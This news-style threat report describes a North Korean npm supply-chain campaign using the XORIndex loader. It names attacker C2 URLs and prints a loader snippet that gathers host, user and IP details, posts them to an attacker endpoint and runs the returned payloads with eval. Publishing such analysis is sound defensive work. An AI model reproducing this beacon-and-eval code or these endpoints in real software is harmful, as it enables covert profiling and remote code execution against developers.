In a significant escalation of cyber operations, North Korean threat actors have deployed 67 malicious npm packages, amassing over 17,000 downloads before detection. This campaign marks an expansion of the ongoing Contagious Interview operation, introducing a new malware loader named XORIndex alongside the existing HexEval Loader infrastructure.
Introduction of XORIndex Malware
The newly identified XORIndex malware is characterized by its use of XOR-encoded strings and index-based obfuscation techniques, reflecting the threat actors’ advancement in evasion strategies. These malicious packages infiltrated the npm ecosystem through 18 different accounts registered with 15 distinct email addresses, with 27 packages remaining active at the time of discovery.
Targeted Entities and Attack Framework
Analysts from Socket.dev have linked this campaign to a broader North Korean cyber espionage effort targeting developers, cryptocurrency holders, and individuals with access to sensitive credentials. The XORIndex Loader functions as a multi-stage attack framework, initially collecting host metadata before decoding and executing the BeaverTail second-stage malware, which subsequently references the InvisibleFerret backdoor for persistent access.
Command and Control Infrastructure
The campaign’s infrastructure utilizes hardcoded command and control endpoints hosted on legitimate platforms like Vercel, employing URLs such as https://soc-log.vercel.app/api/ipcheck and https://log-writter.vercel.app/api/ipcheck. This strategy enables the threat actors to maintain operational security while leveraging trusted hosting services to evade detection mechanisms.
Parallel Campaigns and Download Statistics
Between June and July 2025, the XORIndex Loader accumulated over 9,000 downloads, operating concurrently with the ongoing HexEval campaign, which generated an additional 8,000 downloads across newly discovered packages. This dual-track approach underscores the threat actors’ commitment to maintaining multiple attack vectors simultaneously.
Infection Mechanism and Code Execution
The XORIndex Loader’s infection mechanism initiates immediately upon package installation, utilizing Node.js post-install hooks to execute malicious code without user interaction. The malware conducts a comprehensive reconnaissance phase, gathering system information such as hostname, username, external IP address, geolocation data, and platform details before establishing communication with command and control servers.
A representative code snippet from the eth-auditlog package illustrates the loader’s core functionality:
“`javascript
// Collects local telemetry (host/user/IP/geo/platform)
async function gatherInfo() {
const ip = await publicIp.v4();
const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;
return {
host: os.hostname(),
user: os.userInfo().username,
ip,
location: geo,
platform: os.platform()
};
}
// Sends beacon and executes threat actor-supplied JavaScript payloads
module.exports = async function writer() {
const info = await gatherInfo();
const version = process.env.npm_package_version;
axios.post(https://log-writter.vercel.app/api/ipcheck, { …info, version })
.then(res => {
eval(res.data.s1); // Execute primary payload
eval(res.data.s2); // Execute optional secondary payload
});
};
“`
Evolution of Malware Techniques
The progression from basic prototypes to sophisticated malware demonstrates a deliberate advancement in obfuscation techniques. The malware has evolved from simple remote code execution capabilities to comprehensive system profiling and multi-endpoint command rotation, positioning it as a formidable threat to software supply chain security.
Broader Context of North Korean Cyber Operations
This campaign is part of a broader pattern of North Korean cyber operations targeting software developers and the open-source community. Previous incidents include the deployment of malicious npm packages designed to steal credentials, deploy backdoors, and extract cryptocurrency data. These operations often involve sophisticated social engineering tactics, such as posing as recruiters on LinkedIn to distribute malicious code under the guise of job assignments.
Implications for the Software Development Community
The infiltration of malicious packages into widely used repositories like npm poses significant risks to the software development community. Developers are urged to exercise caution when incorporating third-party packages, verify the authenticity of sources, and implement robust security practices to mitigate the risk of supply chain attacks.
Conclusion
The deployment of 67 malicious npm packages by North Korean threat actors highlights the evolving nature of cyber threats targeting the software supply chain. The introduction of the XORIndex malware, with its sophisticated evasion techniques and multi-stage attack framework, underscores the need for heightened vigilance and proactive security measures within the developer community.
